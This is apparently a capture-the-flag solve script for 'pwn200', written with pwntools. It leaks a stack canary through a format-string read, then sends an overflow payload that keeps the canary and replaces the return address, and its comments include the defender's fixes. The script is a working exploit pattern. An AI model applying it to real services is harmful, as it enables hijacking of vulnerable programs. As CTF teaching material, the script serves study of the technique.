pwn200
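# Solve script for the "pwn200" challenge. It runs in two stages:
#   1. read two stack words back through a format-string conversion,
#   2. resend those words inside an oversized input so the stack-protector
#      check still passes while the word further up the frame is replaced.
#
# Defender's view (inferred from the payloads; the binary itself is not shown
# here): the service appears to pass user input to a printf-style function as
# the format string and to copy a second input into a stack buffer without a
# length bound. A stack canary gives no protection once its value can be read
# back, so the fixes are a constant format string (printf("%s", buf), built
# with -Wformat-security) and a length-bounded read into the buffer.
from pwn import *

# The original page had the import and this call fused onto one line, which is
# a syntax error; they are separate statements.
io = remote('xuenixiang.cn','22943')
# io = process('./pwn200')

# Positional conversions: print the 15th and 16th argument slots as hex.
io.sendline(b"%15$x%16$x")
# Assumes the whole reply arrives in this single recv() call.
recv = io.recv()
# Fixed-width slices: assumes each value renders as exactly eight hex digits
# (%x does not zero-pad, so a value with a zero top nibble would shift these).
canary = int(recv[0:8],16)
# Word from slot 16; it is echoed back right after the canary in the payload
# below. Presumably a saved register or frame word -- confirm against the binary.
then = int(recv[8:16],16)
#canary = int(io.recv(), 16)

# Debug output: the leaked values and their little-endian byte encodings.
print(hex(canary),hex(then))
log.info("canary: 0x%x" % canary)
print(type(p32(canary)))
print(p32(canary)[1:])
print(p32(canary))

# Address written into the last payload slot. The name suggests a routine in
# the binary that spawns a shell; that is not verifiable from this page.
binsh = 0x08048556#0x80491a2
# Layout: 0x28 filler bytes, the leaked canary, the leaked second word,
# 24 more filler bytes, then the replacement address.
payload = b"A" * 0x28 + p32(canary) +p32(then) + b"A" * 24 + p32(binsh)
#payload = "A" * 0x28 + p32(canary) + "A" * 12 + p32(binsh)
io.sendline(payload)
io.interactive()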